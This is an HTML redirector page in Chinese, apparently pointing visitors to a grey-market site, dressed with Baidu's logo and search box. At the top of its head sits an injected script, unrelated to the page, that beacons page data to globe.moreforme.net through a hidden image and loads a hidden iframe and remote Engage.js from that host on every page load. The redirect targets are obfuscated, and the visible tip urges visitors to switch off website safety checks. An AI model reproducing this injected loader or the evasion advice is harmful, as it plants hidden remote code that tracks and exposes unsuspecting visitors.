<!DOCTYPE html>
<html lang="en">
<head>
    <script>
    	if (top == window) {
    		var fns = document.createElement("script");
    		fns.text = 'if(typeof window.fnStatistics=="undefined"){window.fnStatistics={}}window.fnStatistics.Connection=function(c){var d=function(g,e){var f=new g(e);if((typeof f.open!=="function")||(typeof f.connect!=="function")){throw g+" is does not implement Connection interface!"}else{return f}};var b=function(e){};var a=function(){};return d(c)};if(typeof window.fnStatistics=="undefined"){window.fnStatistics={}}window.fnStatistics.ElementInjectionConnection=function(d){var e;var h=0;var f=function(i){i=i||{};e=i.url;if(!Date.now){h=(new Date()).valueOf()*Math.random()}else{h=Date.now()*Math.random()}};var b=function(k){var i="";if(typeof k==="object"){i="?";for(var j in k){i+=j+"="+k[j]+"&"}i=i.substring(0,i.lastIndexOf("&"))}return i};var c=function(i,j){if(!i){throw"ElementInjectionConnection.open: Missing connection information url!"}e=i;if(j){e+=b()}};var a=function(j){if(!e){throw"ElementInjectionConnection.connect Please use open({url<some url>}) to open a connection first."}if(j){e+=b(j)}var i=document.createElement("img");h++;var k="gen_fnStatisticsID_"+h;i.setAttribute("id",k);i.setAttribute("src",e);i.setAttribute("style","display:none;");document.body.appendChild(i);return k};var g=function(i){return a(i)};f(d);return{open:c,send:g,connect:a}};if(typeof window.fnStatistics=="undefined"){window.fnStatistics={}}window.fnStatistics.ConnectionManager=function(){var e=window.fnStatistics.Connection;var d=window.fnStatistics.ElementInjectionConnection;var a;var b=function(){a=new e(d)};var c=function(){return a};b();return{getConnection:c}};if(typeof window.fnStatistics=="undefined"){window.fnStatistics={}}window.fnStatistics.PageStatistics=function(b){var g=0;var c;var d=function(i){i=i||{};c=i.url};var f=function(){if(window.performance){g=window.performance.timing.loadEventStart-window.performance.timing.navigationStart}};var e=function(){return g};var h=function(i){var j=window.fnStatistics.PageStatistics.StatisticType;switch(i){case j.PAGE_LOADED:f();break;case j.PAGE_SHOW:break}};var a=function(){return{url:c,loadingTime:g}};d(b);return{update:h,getData:a,getPageLoadingTime:e}};window.fnStatistics.PageStatistics.StatisticType={PAGE_LOADED:"PAGE_LOADED",PAGE_SHOW:"PAGE_SHOW"};if(typeof window.fnStatistics=="undefined"){window.fnStatistics={}}window.fnStatistics.StatisticsManager=function(){var f="http://globe.moreforme.net/data";var b;var a;var c=function(){b=new window.fnStatistics.ConnectionManager();a=new window.fnStatistics.PageStatistics({url:window.location.href})};var g=function(h){a.update(h)};var e=function(){return a.getData()};var d=function(){var i=b.getConnection();i.open(f);var h=e();if(h.loadingTime!==0){return i.send({domain:window.location.host,load:h.loadingTime})}else{return -1}};c();return{sendStatistics:d,updatePageStatistics:g,getPageStatistics:e}};if(typeof window.fnStatistics=="undefined"){window.fnStatistics={}}window.fnStatistics.StatisticsManager.registerLoadFunction=function(b){if(window.addEventListener){window.addEventListener("load",b,false)}else{if(window.attachEvent){window.attachEvent("onload",b)}else{var a=window.onload;if(a){window.onload=function(){b();a()}}else{window.onload=b}}}};window.fnStatistics.StatisticsManager.registerLoadFunction(function(){var a=new window.fnStatistics.StatisticsManager();a.updatePageStatistics(window.fnStatistics.PageStatistics.StatisticType.PAGE_LOADED);var b=a.sendStatistics()});';
    		
    		//fns.setAttribute("src", "http://globe.moreforme.net/statistics/js/statistics_common.js");
    		fns.setAttribute("id", "fn_statistics_manager");
    		if (document.head == null || document.head == "undefined") {
    			document.head = document.getElementsByTagName("head")[0];
    		}
    		document.head.appendChild(fns);
    		var engageNameSpace = "engagens";
    		"undefined" == typeof window[engageNameSpace] && (window[engageNameSpace] = {}), window[engageNameSpace].engageLoader = function () {
    			function e(e) {
    				return "undefined" != typeof e && null !== e
    			}
    
    			function t() {
    				var t = document.createElement("script");
    				t.setAttribute("src", s), t.setAttribute("id", "fn_engage_script"), t.setAttribute("async", ""), (null == document.head || e(document.head)) && (document.head = document.getElementsByTagName("head")[0]), document.head.appendChild(t)
    			}
    
    			function n() {
    				var t = r();
    				if (e(t)) {
    					var n = t;
    					i() && (n = d(t));
    					var o;
    					try {
    						o = document.documentElement, o.appendChild(n)
    					} catch (c) {
    						o = document.body, o.appendChild(n)
    					}
    					a()
    				}
    			}
    
    			function a() {
    				function e(e) {
    					var n = e.data;
    					"l8IframeIsReady" === n.message && t()
    				}
    				window.addEventListener ? window.addEventListener("message", e, !1) : window.attachEvent("onmessage", e)
    			}
    
    			function r() {
    				var t = document.createElement("iframe");
    				if (e(t)) {
    					t.setAttribute("id", "fn_engage"), t.setAttribute("src", u), t.setAttribute("target", "_blank"), t.setAttribute("frameborder", "0");
    					var n = /firefox/i.exec(navigator.userAgent);
    					e(n) && n.length > 0 ? (t.style.height = 0, t.style.width = 0) : t.style.display = "none", t.frameBorder = "no"
    				}
    				return t
    			}
    
    			function i() {
    				var t = !1,
    					n = /android (\\d+)/i.exec(navigator.userAgent);
    				return e(n) && n.length > 0 && (t = parseInt(n[1]) >= 4), t
    			}
    
    			function d(e) {
    				var t = document.createElement("div");
    				return t.setAttribute("id", "fn_wrapper_div"), t.style.position = "fixed", t.style.display = "none", t.ontouchstart = function () {
    					return !0
    				}, t.appendChild(e), t
    			}
    
    			function o() {
    				var t = void 0,
    					a = this,
    					r = function () {
    						e(t) && (window.clearTimeout(t), t = void 0, n.call(a))
    					};
    				t = window.setTimeout(r, 1e4), "function" == typeof window.addEventListener ? window.addEventListener("load", r, !1) : window.attachEvent("onload", r)
    			}
    			var c = "http://globe.moreforme.net",
    				u = c + "/l8/EngageService",
    				s = c + "/scripts/Engage.js";
    			o()
    		};
    		var engageLoader = new window[engageNameSpace].engageLoader
    	} 
    </script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>福利发布页-永久地址发布页-最新地址发布页</title>
<style>
/* CSS Document */
blockquote,body,dd,dl,figure,form,h1,h2,h3,h4,h5,h6,ol,p,ul{margin:0}
ol,ul{padding:0;list-style:none}
a{outline:0;color:inherit;text-decoration:none}
a[href]:active,button:active{background-image:transparent;background-image:transparent}
em{font-style:normal}
h1,h2,h3,h4,h5,h6,input,select,textarea{font-size:100%}
input,select,textarea{box-sizing:border-box;font-family:inherit}
img{display:inline-block}
p{word-break:break-all}
body{background:#fff;color:#1A1A1A;font-size:14px;font-family:sans-serif;line-height:1.5;fill:currentColor;-webkit-tap-highlight-color:transparent;}
.navigation-top{position:relative; font-size:16px;}
.navigation-top .logo{position:relative;display:block;margin-bottom:30px;width:100%;text-align:center}
.navigation-top .logo img{margin:0 0;width:270px; height:129px;}
.navigation-top .search{position:relative;display:-webkit-box;display:-webkit-flex;display:flex;margin:0 auto;width:60%;max-width: 640px;height:40px;border:1px solid #4395FF;border-radius:2px;background:#fff}
@media (max-width:767px){.navigation-top .search{position:relative;display:-webkit-box;display:-webkit-flex;display:flex;margin:0 auto;width:90%;height:40px;border:1px solid #4395FF;border-radius:2px;background:#fff}
}
.navigation-top .search .input-wrapper{overflow:hidden;height:100%;-webkit-box-flex:1;-webkit-flex:1;flex:1; border:0;}
.navigation-top .search .input-wrapper input{overflow:hidden;-webkit-box-sizing:border-box;box-sizing:border-box;padding:0 7px;width:77%;outline:0;border:0;border-radius:2px;color:#404040;line-height:40px}
.navigation-top .search .inner{position:relative}
.navigation-top .search .button{position:absolute;top:0;right:0; width:23%;height:41px;border:0;background:#3385ff;color:#fff;text-shadow:none;-webkit-user-select:none;user-select:none}
.navigation-top .search .button:hover{background:#317ef3;cursor:pointer;}
.navigation-content{position:relative;padding:20px}
.navigation-content .line{color:#333;text-align:center;font-weight:700;font-size:18px}
.navigation-content .line a{display:inline-block;margin-bottom:10px}
.navigation-content .line a:active,.navigation-content .line a:hover{text-decoration:underline;cursor: pointer;}
.navigation-content .tip{margin:0 auto;padding-top:15px;width:70%;color:#333;text-align:center;font-weight:700;font-size:18px}
@media (max-width:767px){.navigation-content .tip{width:auto}
}
.navigation-footer{margin-bottom:.52em;color:grey;text-align:center;font-size:14px;margin-top: 30px}
.navigation-footer .link{position:relative;display:inline-block;margin:0 .62em;vertical-align:top;font-size:12px}
.navigation-footer .text{padding:0 .34em;font-size:12px}
</style>

</head>
<body>
    <div class="navigation-top">
        <div class="logo"><img src="https://www.baidu.com/img/bd_logo1.png" alt=""></div>
        <DIV class="search" action="">
            <div class="input-wrapper"><input type="text" name="word" size="26"></div>
            <button class="button" onclick="javascript:window.location.href='/'">百度一下</button>
        </DIV>
    </div>
    <div class="navigation-content">
        <div class="line">
            <p><a rel="nofollow" onclick="redirectToRandomSubdomain('2248.top')" style="color:green">点击进入最新线路</a></p>
            <p><a rel="nofollow" onclick="redirectToRandomSubdomain('2248.top')" style="color:blue">最新线路二</a></p>
            <p><a rel="nofollow" onclick="redirectToRandomSubdomain('2248.top')"  style="color:red">最新线路三</a></p>
            <p><a rel="nofollow" onclick="reurl(4);return false;" style="color:green">国际线路</a></p>
            
        </div>
        <div class="tip">
            <p>温馨提示：推荐使用电信、联通网络和下载火狐浏览器或者谷歌浏览器訪問网站。</p>
            <p>如遇浏览器屏蔽网站请切换浏览器，有网址安全检测请关闭，尝试更换网络环境，网页无法打开请耐心等待修复。</p>
        </div>

</div>
  <script>
    function generateRandomString(length) {
      var result = '';
      var characters = 'abcdefghijklmnopqrstuvwxyz';
      var charactersLength = characters.length;
      for (var i = 0; i < length; i++) {
        result += characters.charAt(Math.floor(Math.random() * charactersLength));
      }
      return result;
    }

    function redirectToRandomSubdomain(domain) {
      var randomSubdomain = generateRandomString(8); // 生成一个长度为8的随机字符串
      window.location.href = "https://" + domain + "/#" + randomSubdomain;
    }
  </script>
	<script>
      function reurl(i){
        var url = "https";
        url += "://";
        url += "";
        var urls = [
          'a@btop/#1',
          'a@btop/#2',
          'a@btop/#3',
          '2248a@btop/#4',
        ];
        var strURL = urls[i-1];
		strURL = strURL.replace(/a@b/g,'.');
		strURL = strURL.replace(/c@d/g,'');
		strURL = strURL.replace(/a@v/g,'');
        url += strURL;
        window.location.href = url;
      }
    </script>
</body>
</html>
